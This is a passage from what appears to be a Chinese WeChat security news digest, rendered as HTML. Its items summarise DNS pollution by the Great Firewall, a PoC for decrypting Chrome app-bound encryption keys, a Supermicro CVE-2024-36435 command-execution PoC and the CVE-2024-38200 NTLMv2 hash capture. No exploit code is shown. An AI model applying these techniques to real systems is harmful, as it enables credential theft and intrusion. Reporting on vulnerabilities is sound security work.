	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DNS 污染问题：中国防火长城通过篡改 DNS 查询结果，导致域名解析到随机或特定的 IP 地址，这种行为可能是出于审查目的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">影响范围广泛：受影响的域名不仅限于 .cn 顶级域名，任何通过中国基础设施路由的域名都可能受到影响。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">关键词触发：DNS 污染行为似乎基于子域名中的关键词触发，这些关键词与中国审查的内容相关联。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全风险：这种 DNS 污染可能导致子域名接管、XSS 攻击以及其他安全问题。</section></li></ul>
	<br/>
	<p>🏷️: 防火墙, 漏洞, DNS, 攻击, 中国</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 通过RPC调用Google Chrome提升服务解密App绑定密钥</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页提供了一个Proof-of-Concept (PoC) 示例，用于通过对 Google Chrome Elevation Service 的远程过程调用 (RPC) 来解密应用程序绑定的加密密钥。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8808490e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu8kN5x81qUyPJYscpO4xV0PxgbzELAr1t6Od5TN9maicP47uKKY6Qicvg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">绕过App-Bound Chromium 加密：最小 PoC 示例</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Chromium 应用绑定加密被绕过，PoC 可解密 Local State 密钥</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuRicpNkVwY6ZibhSMT07IvHWKS2yloOJiahs1YYyhZS66ayanDPia6wVFLQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuRicpNkVwY6ZibhSMT07IvHWKS2yloOJiahs1YYyhZS66ayanDPia6wVFLQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858252124825421"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Google Chrome Elevation Service 可以通过 RPC 调用来解密应用程序绑定的加密密钥。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过提供的 C++ 代码，可以实现对存储在文件中的加密密钥进行解密的操作。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这个 PoC 展示了如何与 Elevation Service 进行交互，包括如何调用其提供的接口来执行解密操作。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">代码中使用了 COM 技术和 Windows 特有的安全机制，如 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CoInitializeEx</code>、<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CoCreateInstance</code> 和 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CoSetProxyBlanket</code>。</section></li></ul>
	<br/>
	<p>🏷️: Google Chrome, 加密, RPC调用, 安全漏洞, PoC</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 Supermicro 系统漏洞 CVE-2024-36435 的 PoC 工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页提供了一个名为 CVE-2024-36435.py 的 PoC（Proof of Concept）工具，用于展示 Supermicro 设备中的一个安全漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=7ff787bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuYruoBoEquz8qGc1dplbBaw72USjDqia8jvjc8P5Dr9Snf5MPb0ru6tA%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">公开的 PoC 利用漏洞执行任意命令</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuIoibBpjFib3dy5fHiaMyYn58kMBMjmkTq6hCm0uvz37d6UMc2PIjMmXLA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuIoibBpjFib3dy5fHiaMyYn58kMBMjmkTq6hCm0uvz37d6UMc2PIjMmXLA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848545152554158"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">GitHub 仓库中的 CVE-2024-36435.py 文件是一个用于展示 Supermicro 设备漏洞的 PoC 工具。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具与 Supermicro 硬件的 CVE-2024-36435 漏洞相关。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网页显示了最新的提交记录，包括代码更新的细节和统计信息。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">用户尝试执行某个操作时遇到了限制，这可能是由于权限不足、操作限制或其他技术问题。</section></li></ul>
	<br/>
	<p>🏷️: CVE-2024-36435, Supermicro, PoC, 漏洞, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 Office URI方案中的NTLMv2哈希捕获漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了 CVE-2024-38200 漏洞，该漏洞利用 Office URI 方案和 NTLM 认证机制，通过 HTTP 302 重定向到 UNC 路径，捕获 NTLMv2 哈希值，进而可能导致 NTLM Relaying 攻击，甚至可能在默认配置下通过两次点击就能获取域控制器权限。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.607565011820331" data-w="423" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=190a6d49&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuFvqsQ2pdJTQSWToTdXqxibCUqA9BqEXibibKezABR43dsfdz8IaJicju0w%2F640%3Ffrom%3Dappmsg"/>
	
